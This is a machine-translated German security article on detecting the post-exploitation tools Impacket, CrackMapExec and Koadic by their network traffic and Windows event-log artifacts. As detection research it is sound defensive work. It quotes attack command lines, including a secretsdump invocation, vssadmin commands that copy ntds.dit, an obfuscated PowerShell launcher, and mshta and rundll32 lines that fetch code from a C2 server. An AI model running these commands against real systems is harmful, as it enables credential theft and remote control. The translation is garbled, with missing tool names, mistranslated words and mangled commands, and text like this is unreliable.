Die Zahl der Angriffe im Unternehmensbereich nimmt beispielsweise jedes Jahr zu als 2016 und Ende 2018 - als in der Vorperiode. Einschließlich derjenigen, bei denen das Hauptarbeitswerkzeug das Windows-Betriebssystem ist. In den Jahren 2017–2018 wurden die APT Dragonfly, APT28, verübte Angriffe auf Regierungs- und Militärorganisationen in Europa, Nordamerika und Saudi-Arabien. Und wir haben dafür drei Tools verwendet - , и . Ihr Quellcode ist offen und auf GitHub verfügbar.
Es ist erwähnenswert, dass diese Tools nicht zum anfänglichen Eindringen verwendet werden, sondern zur Entwicklung eines Angriffs innerhalb der Infrastruktur. Angreifer nutzen sie in verschiedenen Phasen des Angriffs nach dem Eindringen in den Perimeter. Dies ist übrigens schwer und oft nur mit Hilfe der Technik zu erkennen oder Werkzeuge, die es ermöglichen . Die Tools bieten eine Vielzahl von Funktionen, von der Übertragung von Dateien über die Interaktion mit der Registrierung bis hin zur Ausführung von Befehlen auf einem Remote-Computer. Wir haben eine Untersuchung dieser Tools durchgeführt, um ihre Netzwerkaktivität zu bestimmen.
Was wir tun mussten:
- Verstehen Sie, wie Hacking-Tools funktionieren. Finden Sie heraus, was Angreifer ausnutzen müssen und welche Technologien sie nutzen können.
- Finden Sie heraus, was von Informationssicherheitstools in den ersten Phasen eines Angriffs nicht erkannt wird. Die Aufklärungsphase kann übersprungen werden, entweder weil der Angreifer ein interner Angreifer ist oder weil der Angreifer eine Lücke in der Infrastruktur ausnutzt, die zuvor nicht bekannt war. Es wird möglich, die gesamte Kette seiner Handlungen wiederherzustellen, daher der Wunsch, weitere Bewegungen zu erkennen.
- Eliminieren Sie Fehlalarme durch Intrusion-Detection-Tools. Wir dürfen nicht vergessen, dass es häufig zu Fehlern kommen kann, wenn bestimmte Handlungen allein durch Aufklärung erkannt werden. In der Regel gibt es in der Infrastruktur eine ausreichende Anzahl von Möglichkeiten, die auf den ersten Blick nicht von legitimen zu unterscheiden sind, um an Informationen zu gelangen.
Was bieten diese Tools Angreifern? Wenn es sich um Impacket handelt, erhalten Angreifer eine große Bibliothek von Modulen, die in verschiedenen Phasen des Angriffs verwendet werden können, die auf das Durchbrechen des Perimeters folgen. Viele Tools nutzen intern Impacket-Module – zum Beispiel Metasploit. Es verfügt über dcomexec und wmiexec für die Remote-Befehlsausführung und Secretsdump zum Abrufen von Konten aus dem Speicher, die von Impacket hinzugefügt werden. Infolgedessen stellt die korrekte Erkennung der Aktivität einer solchen Bibliothek die Erkennung von Derivaten sicher.
Es ist kein Zufall, dass die Entwickler „Powered by Impacket“ über CrackMapExec (oder einfach CME) geschrieben haben. Darüber hinaus verfügt CME über vorgefertigte Funktionen für beliebte Szenarien: Mimikatz zum Erhalten von Passwörtern oder deren Hashes, Implementierung von Meterpreter oder Empire Agent für die Remote-Ausführung und Bloodhound an Bord.
Das dritte Tool, das wir ausgewählt haben, war Koadic. Es ist recht neu, wurde 25 auf der internationalen Hackerkonferenz DEFCON 2017 vorgestellt und zeichnet sich durch einen nicht standardisierten Ansatz aus: Es funktioniert über HTTP, Java Script und Microsoft Visual Basic Script (VBS). Diesen Ansatz nennt man „vom Land leben“: Das Tool nutzt eine Reihe von in Windows integrierten Abhängigkeiten und Bibliotheken. Die Entwickler nennen es COM Command & Control oder C3.
IMPACKET
Die Funktionalität von Impacket ist sehr breit gefächert und reicht von der Aufklärung innerhalb von AD und dem Sammeln von Daten von internen MS SQL-Servern bis hin zu Techniken zum Erhalten von Anmeldeinformationen: Dies ist ein SMB-Relay-Angriff und das Erhalten der Datei ntds.dit, die Hashes von Benutzerkennwörtern enthält, von einem Domänencontroller. Impacket führt Befehle auch remote mit vier verschiedenen Methoden aus: WMI, Windows Scheduler Management Service, DCOM und SMB und erfordert dafür Anmeldeinformationen.
Secretsdump
Werfen wir einen Blick auf Secretsdump. Dies ist ein Modul, das sowohl auf Benutzercomputer als auch auf Domänencontroller abzielen kann. Es kann verwendet werden, um Kopien der Speicherbereiche LSA, SAM, SECURITY, NTDS.dit zu erhalten, sodass es in verschiedenen Phasen des Angriffs sichtbar ist. Der erste Schritt im Betrieb des Moduls ist die Authentifizierung über SMB, die entweder das Passwort des Benutzers oder seinen Hash erfordert, um den Pass the Hash-Angriff automatisch durchzuführen. Als nächstes kommt eine Anfrage, den Zugriff auf den Service Control Manager (SCM) zu öffnen und über das Winreg-Protokoll Zugriff auf die Registrierung zu erhalten, mit dem ein Angreifer die Daten der interessierenden Zweige herausfinden und Ergebnisse über SMB erhalten kann.
In Abb. In Abb. 1 sehen wir, wie genau bei Verwendung des Winreg-Protokolls der Zugriff über einen Registrierungsschlüssel mit einem LSA erfolgt. Verwenden Sie dazu den Befehl DCERPC mit Opcode 15 – OpenKey.
Reis. 1. Öffnen eines Registrierungsschlüssels mithilfe des Winreg-Protokolls
Wenn als nächstes Zugriff auf den Schlüssel erhalten wird, werden die Werte mit dem SaveKey-Befehl mit Opcode 20 gespeichert. Impacket tut dies auf eine ganz bestimmte Art und Weise. Die Werte werden in einer Datei gespeichert, deren Name eine Zeichenfolge aus 8 zufälligen Zeichen mit angehängter Datei .tmp ist. Darüber hinaus erfolgt der weitere Upload dieser Datei per SMB aus dem System32-Verzeichnis (Abb. 2).
Reis. 2. Schema zum Abrufen eines Registrierungsschlüssels von einem Remote-Computer
Es stellt sich heraus, dass solche Aktivitäten im Netzwerk durch Abfragen an bestimmte Registrierungszweige mithilfe des Winreg-Protokolls, spezifischer Namen, Befehle und deren Reihenfolge erkannt werden können.
Dieses Modul hinterlässt außerdem Spuren im Windows-Ereignisprotokoll, sodass es leicht erkannt werden kann. Zum Beispiel als Ergebnis der Ausführung des Befehls
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCIm Windows Server 2016-Protokoll sehen wir die folgende wichtige Ereignissequenz:
1. 4624 – Remote-Anmeldung.
2. 5145 – Überprüfung der Zugriffsrechte auf den Winreg-Remote-Dienst.
3. 5145 – Überprüfung der Dateizugriffsrechte im System32-Verzeichnis. Die Datei hat den oben genannten zufälligen Namen.
4. 4688 – Erstellen eines cmd.exe-Prozesses, der vssadmin startet:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 – Erstellen eines Prozesses mit dem Befehl:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 – Erstellen eines Prozesses mit dem Befehl:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 – Erstellen eines Prozesses mit dem Befehl:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Wie viele Post-Exploitation-Tools verfügt Impacket über Module zur Fernausführung von Befehlen. Wir konzentrieren uns auf smbexec, das eine interaktive Befehlsshell auf einem Remotecomputer bereitstellt. Auch dieses Modul erfordert eine Authentifizierung per SMB, entweder mit einem Passwort oder einem Passwort-Hash. In Abb. In Abbildung 3 sehen wir ein Beispiel für die Funktionsweise eines solchen Tools, in diesem Fall ist es die lokale Administratorkonsole.
Reis. 3. Interaktive smbexec-Konsole
Der erste Schritt von smbexec nach der Authentifizierung besteht darin, den SCM mit dem Befehl OpenSCManagerW (15) zu öffnen. Die Abfrage ist bemerkenswert: Das Feld „MachineName“ ist DUMMY.
Reis. 4. Aufforderung zum Öffnen des Service Control Managers
Als nächstes wird der Dienst mit dem Befehl CreateServiceW (12) erstellt. Im Fall von smbexec können wir jedes Mal die gleiche Befehlskonstruktionslogik sehen. In Abb. 5 Grün zeigt unveränderliche Befehlsparameter an, Gelb zeigt an, was ein Angreifer ändern kann. Es ist leicht zu erkennen, dass der Name der ausführbaren Datei, ihres Verzeichnisses und der Ausgabedatei geändert werden kann, der Rest ist jedoch viel schwieriger zu ändern, ohne die Logik des Impacket-Moduls zu beeinträchtigen.
Reis. 5. Fordern Sie die Erstellung eines Dienstes mit dem Service Control Manager an
Auch im Windows-Ereignisprotokoll hinterlässt Smbexec deutliche Spuren. Im Windows Server 2016-Protokoll für die interaktive Befehlsshell mit dem Befehl ipconfig sehen wir die folgende Schlüsselsequenz von Ereignissen:
1. 4697 – Installation des Dienstes auf dem Computer des Opfers:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 – Erstellung des Prozesses cmd.exe mit den Argumenten aus Punkt 1.
3. 5145 – Überprüfung der Zugriffsrechte auf die __output-Datei im C$-Verzeichnis.
4. 4697 – Installation des Dienstes auf dem Computer des Opfers.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 – Erstellung des Prozesses cmd.exe mit den Argumenten aus Punkt 4.
6. 5145 – Überprüfung der Zugriffsrechte auf die __output-Datei im C$-Verzeichnis.
Impacket ist die Grundlage für die Entwicklung von Angriffstools. Es unterstützt nahezu alle Protokolle der Windows-Infrastruktur und verfügt gleichzeitig über eigene charakteristische Merkmale. Hier sind spezifische WinReg-Anfragen und die Verwendung der SCM-API mit charakteristischer Befehlsbildung sowie dem Dateinamenformat und der SMB-Freigabe SYSTEM32 aufgeführt.
Crackmapexec
Das CME-Tool dient in erster Linie dazu, die Routineaktionen zu automatisieren, die ein Angreifer ausführen muss, um innerhalb des Netzwerks vorzudringen. Es ermöglicht Ihnen die Zusammenarbeit mit dem bekannten Empire-Agenten und Meterpreter. Um Befehle heimlich auszuführen, kann CME sie verschleiern. Mit Bloodhound (einem separaten Aufklärungstool) kann ein Angreifer die Suche nach einer aktiven Domänenadministratorsitzung automatisieren.
Bluthund
Bloodhound ermöglicht als eigenständiges Tool eine erweiterte Aufklärung innerhalb des Netzwerks. Es sammelt Daten über Benutzer, Maschinen, Gruppen und Sitzungen und wird als PowerShell-Skript oder Binärdatei bereitgestellt. Zum Sammeln von Informationen werden LDAP- oder SMB-basierte Protokolle verwendet. Das CME-Integrationsmodul ermöglicht es, Bloodhound auf den Computer des Opfers herunterzuladen, auszuführen und nach der Ausführung die gesammelten Daten zu empfangen, wodurch Aktionen im System automatisiert und weniger auffällig gemacht werden. Die grafische Shell von Bloodhound stellt die gesammelten Daten in Form von Diagrammen dar, sodass Sie den kürzesten Weg vom Computer des Angreifers zum Domänenadministrator finden können.
Reis. 6. Bloodhound-Schnittstelle
Um auf dem Computer des Opfers ausgeführt zu werden, erstellt das Modul mithilfe von ATSVC und SMB eine Aufgabe. ATSVC ist eine Schnittstelle zum Arbeiten mit dem Windows Taskplaner. CME verwendet seine NetrJobAdd(1)-Funktion, um Aufgaben über das Netzwerk zu erstellen. Ein Beispiel dafür, was das CME-Modul sendet, ist in Abb. dargestellt. 7: Dies ist ein cmd.exe-Befehlsaufruf und verschleierter Code in Form von Argumenten im XML-Format.
Abb.7. Erstellen einer Aufgabe über CME
Nachdem die Aufgabe zur Ausführung übermittelt wurde, startet die Maschine des Opfers Bloodhound selbst, was im Datenverkehr sichtbar ist. Das Modul zeichnet sich durch LDAP-Abfragen aus, um Standardgruppen und eine Liste aller Maschinen und Benutzer in der Domäne abzurufen und Informationen über aktive Benutzersitzungen über die SRVSVC NetSessEnum-Anfrage zu erhalten.
Reis. 8. Abrufen einer Liste aktiver Sitzungen über SMB
Darüber hinaus wird das Starten von Bloodhound auf dem Computer eines Opfers mit aktivierter Überwachung von einem Ereignis mit der ID 4688 (Prozesserstellung) und dem Prozessnamen begleitet «C:WindowsSystem32cmd.exe». Bemerkenswert daran sind die Befehlszeilenargumente:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Das Modul enum_avproducts ist aus Sicht der Funktionalität und Implementierung sehr interessant. Mit WMI können Sie die WQL-Abfragesprache verwenden, um Daten von verschiedenen Windows-Objekten abzurufen, was im Wesentlichen das ist, was dieses CME-Modul verwendet. Es generiert Abfragen an die Klassen AntiSpywareProduct und AntiМirusProduct zu den auf dem Computer des Opfers installierten Schutztools. Um die erforderlichen Daten zu erhalten, stellt das Modul eine Verbindung zum RootSecurityCenter2-Namespace her, generiert dann eine WQL-Abfrage und empfängt eine Antwort. In Abb. Abbildung 9 zeigt den Inhalt solcher Anfragen und Antworten. In unserem Beispiel wurde Windows Defender gefunden.
Reis. 9. Netzwerkaktivität des Moduls enum_avproducts
Oft ist die WMI-Überwachung (Trace WMI-Activity), in deren Ereignissen Sie nützliche Informationen zu WQL-Abfragen finden, deaktiviert. Wenn es jedoch aktiviert ist und das Skript enum_avproducts ausgeführt wird, wird ein Ereignis mit der ID 11 gespeichert. Es enthält den Namen des Benutzers, der die Anfrage gesendet hat, und den Namen im RootSecurityCenter2-Namespace.
Jedes der CME-Module hatte seine eigenen Artefakte, seien es spezifische WQL-Abfragen oder die Erstellung einer bestimmten Art von Aufgabe in einem Aufgabenplaner mit Verschleierung und Bloodhound-spezifischer Aktivität in LDAP und SMB.
KOADIC
Eine Besonderheit von Koadic ist die Verwendung von in Windows integrierten JavaScript- und VBScript-Interpretern. In diesem Sinne folgt es dem Trend, vom Land zu leben, das heißt, es weist keine externen Abhängigkeiten auf und verwendet Standard-Windows-Tools. Hierbei handelt es sich um ein Tool für vollständiges Command & Control (CnC), da nach der Infektion ein „Implantat“ auf der Maschine installiert wird, das deren Steuerung ermöglicht. Eine solche Maschine wird in der Koadic-Terminologie „Zombie“ genannt. Wenn auf Seiten des Opfers nicht genügend Berechtigungen für den vollständigen Betrieb vorhanden sind, hat Koadic die Möglichkeit, diese mithilfe von Techniken zur Umgehung der Benutzerkontensteuerung (UAC-Umgehung) zu erhöhen.
Reis. 10. Koadische Muschel
Das Opfer muss die Kommunikation mit dem Command & Control-Server initiieren. Dazu muss sie sich an einen zuvor vorbereiteten URI wenden und mithilfe eines der Stager den Haupt-Koadic-Körper erhalten. In Abb. Abbildung 11 zeigt ein Beispiel für den mshta-Staginger.
Reis. 11. Initialisieren einer Sitzung mit dem CnC-Server
Anhand der Antwortvariablen WS wird deutlich, dass die Ausführung über WScript.Shell erfolgt und die Variablen STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE wichtige Informationen zu den Parametern der aktuellen Sitzung enthalten. Dies ist das erste Anfrage-Antwort-Paar in einer HTTP-Verbindung mit einem CnC-Server. Nachfolgende Anfragen stehen in direktem Zusammenhang mit der Funktionalität der aufgerufenen Module (Implantate). Alle Koadic-Module funktionieren nur mit einer aktiven Sitzung mit CnC.
Mimikatz
So wie CME mit Bloodhound funktioniert, arbeitet Koadic mit Mimikatz als separates Programm und verfügt über mehrere Möglichkeiten, es zu starten. Nachfolgend finden Sie ein Anfrage-Antwort-Paar zum Herunterladen des Mimikatz-Implantats.
Reis. 12. Übertragen Sie Mimikatz zu Koadic
Sie können sehen, wie sich das URI-Format in der Anfrage geändert hat. Es enthält nun einen Wert für die csrf-Variable, die für das ausgewählte Modul zuständig ist. Achten Sie nicht auf ihren Namen; Wir alle wissen, dass CSRF normalerweise unterschiedlich verstanden wird. Die Antwort war derselbe Hauptteil von Koadic, zu dem Code für Mimikatz hinzugefügt wurde. Es ist ziemlich groß, also schauen wir uns die wichtigsten Punkte an. Hier haben wir die in Base64 codierte Mimikatz-Bibliothek, eine serialisierte .NET-Klasse, die sie einfügt, und Argumente zum Starten von Mimikatz. Das Ausführungsergebnis wird im Klartext über das Netzwerk übertragen.
Reis. 13. Ergebnis der Ausführung von Mimikatz auf einem Remote-Computer
Exec_cmd
Koadic verfügt auch über Module, die Befehle aus der Ferne ausführen können. Hier sehen wir die gleiche URI-Generierungsmethode und die bekannten Sid- und CSRF-Variablen. Im Fall des Moduls exec_cmd wird dem Rumpf Code hinzugefügt, der Shell-Befehle ausführen kann. Unten wird ein solcher Code gezeigt, der in der HTTP-Antwort des CnC-Servers enthalten ist.
Reis. 14. Implantationscode exec_cmd
Für die Codeausführung ist die Variable GAWTUUGCFI mit dem bekannten WS-Attribut erforderlich. Mit seiner Hilfe ruft das Implantat die Shell auf und verarbeitet zwei Codezweige – Shell.exec mit der Rückgabe des Ausgabedatenstroms und Shell.run ohne Rückgabe.
Koadic ist kein typisches Tool, verfügt aber über seine eigenen Artefakte, anhand derer es im legitimen Datenverkehr gefunden werden kann:
- spezielle Bildung von HTTP-Anfragen,
- mit der winHttpRequests-API,
- Erstellen eines WScript.Shell-Objekts über ActiveXObject,
- großer ausführbarer Körper.
Die anfängliche Verbindung wird vom Stager initiiert, sodass seine Aktivität anhand von Windows-Ereignissen erkannt werden kann. Für mshta ist dies Ereignis 4688, das die Erstellung eines Prozesses mit dem Startattribut anzeigt:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Während Koadic läuft, können Sie andere 4688 Ereignisse mit Attributen sehen, die es perfekt charakterisieren:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Befund
Der Trend, vom Land zu leben, erfreut sich bei Kriminellen immer größerer Beliebtheit. Sie nutzen die in Windows integrierten Tools und Mechanismen für ihre Bedürfnisse. Wir sehen, dass die beliebten Tools Koadic, CrackMapExec und Impacket, die diesem Prinzip folgen, zunehmend in APT-Berichten auftauchen. Auch die Anzahl der Forks auf GitHub für diese Tools wächst und es tauchen neue auf (mittlerweile gibt es bereits etwa tausend davon). Der Trend erfreut sich aufgrund seiner Einfachheit immer größerer Beliebtheit: Angreifer benötigen keine Tools von Drittanbietern; sie befinden sich bereits auf den Computern der Opfer und helfen ihnen, Sicherheitsmaßnahmen zu umgehen. Wir konzentrieren uns auf die Untersuchung der Netzwerkkommunikation: Jedes der oben beschriebenen Tools hinterlässt seine eigenen Spuren im Netzwerkverkehr; Eine detaillierte Untersuchung ermöglichte es uns, unser Produkt zu lehren Sie können sie aufspüren, was letztendlich dabei hilft, die gesamte Kette von Cyber-Vorfällen zu untersuchen, an denen sie beteiligt sind.
Autoren:
- Anton Tyurin, Leiter der Abteilung Expert Services, PT Expert Security Center, Positive Technologies
- Egor Podmokov, Experte, PT Expert Security Center, Positive Technologies
Source: habr.com